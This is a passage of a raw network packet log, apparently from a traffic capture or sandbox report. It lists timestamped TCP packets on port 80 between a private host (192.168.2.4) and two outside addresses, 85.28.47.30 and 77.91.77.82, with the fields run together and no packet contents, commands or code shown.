                                                                Jul 5, 2024 04:23:11.434397936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434596062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434607983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434618950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434632063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434644938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434664011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434664965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434675932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434686899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434700966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434705019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434708118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434717894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434729099 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434731007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434737921 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434756041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434762001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434771061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434772968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434787989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434811115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434815884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434825897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434833050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434838057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434849977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434849977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434871912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434871912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434890985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434962988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434973001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434983015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434993029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434995890 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435003042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435005903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435019970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435020924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435033083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435039043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435045004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435053110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435055017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435074091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435075045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435081005 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435086966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435098886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435110092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435122967 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435142994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435219049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435230017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435240030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435250998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435262918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435264111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435271025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435282946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435293913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435296059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435307026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435313940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435321093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435332060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.435336113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435342073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435362101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.435369015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.512691021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.512748003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.512778997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.512799978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.512810946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.512828112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.512851954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.512859106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.512870073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.512878895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.512895107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.512969971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.514808893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.514823914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.514834881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.514856100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.514883041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.514894009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.514905930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.514915943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.514934063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.514941931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.514956951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.514986038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515038013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515048981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515060902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515072107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515079975 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515084028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515103102 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515115023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515130997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515141964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515156984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515168905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515175104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515182972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515193939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515194893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515224934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515227079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515235901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515249014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515254974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515261889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515271902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.515285015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515285015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.515300035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.519784927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519797087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519807100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519829988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.519830942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519840002 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.519844055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519879103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.519910097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519921064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519931078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519941092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519949913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.519953966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519962072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.519967079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.519999027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.520004988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.520004988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.520009995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.520023108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.520042896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.520070076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524666071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524677038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524688005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524720907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524729967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524741888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524745941 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524754047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524771929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524784088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524794102 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524816990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524828911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524840117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524851084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524852991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524863005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524873018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524876118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524895906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524904966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524933100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524944067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.524977922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.524996996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525043011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525106907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525116920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525130033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525146008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525146961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525161028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525171995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525171995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525192022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525214911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525259972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525279999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525295973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525310993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525336981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525347948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525357962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525378942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525408030 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525417089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525428057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525437117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525445938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525454998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525463104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525479078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525497913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525516033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525528908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525537968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525548935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525558949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525561094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525583029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525597095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525603056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525614023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525623083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525631905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525636911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525644064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525645018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525657892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525669098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525690079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525703907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525713921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525722980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525732994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525738001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525744915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525752068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525759935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525775909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525806904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525834084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525845051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525855064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525866985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525870085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525886059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525911093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525934935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525945902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525954962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525964975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525974989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525975943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525985956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.525994062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.525998116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.526010990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.526019096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.526053905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.845906973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.845983028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.851979971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.851991892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.851995945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.852032900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.852041960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.998852015 CEST804973777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:11.998922110 CEST4973780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:11.999600887 CEST4973780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:12.010967970 CEST804973777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:12.228672981 CEST804973777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:12.228725910 CEST4973780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:12.332772017 CEST4973780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:12.333161116 CEST4974080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:12.338242054 CEST804974077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:12.338253021 CEST804973777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:12.338310957 CEST4973780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:12.338335991 CEST4974080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:12.338500977 CEST4974080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:12.343223095 CEST804974077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:12.675211906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:12.675426006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:12.759167910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:12.759167910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:12.763938904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:12.764065027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:12.764161110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:13.048114061 CEST804974077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:13.048350096 CEST4974080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:13.049065113 CEST4974080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:13.053754091 CEST804974077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:13.271107912 CEST804974077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:13.271357059 CEST4974080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:13.379857063 CEST4974080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:13.380274057 CEST4974380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:13.385145903 CEST804974377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:13.385215998 CEST804974077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:13.385242939 CEST4974380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:13.385282040 CEST4974080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:13.385473967 CEST4974380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:13.390183926 CEST804974377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:13.423636913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:13.423751116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:13.490577936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:13.495414972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:14.101646900 CEST804974377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:14.101718903 CEST4974380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:14.103837013 CEST4974380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:14.108655930 CEST804974377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:14.147173882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:14.147249937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:14.330202103 CEST804974377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:14.330261946 CEST4974380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:14.450908899 CEST4974380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:14.451495886 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:14.451788902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:14.456082106 CEST804974377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:14.456132889 CEST4974380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:14.456337929 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:14.456393957 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:14.456542969 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:14.456553936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:14.461293936 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:15.005637884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.005693913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.155409098 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:15.155476093 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:15.156028032 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:15.160752058 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:15.211714983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.216563940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.374460936 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:15.374571085 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:15.393934011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.393945932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.393956900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.393995047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.394030094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.394063950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394076109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394110918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.394459963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394471884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394495010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394507885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394519091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394529104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394539118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.394541979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394555092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394567013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394576073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.394581079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.394598961 CEST4973280192.168.2.485.28.47.30
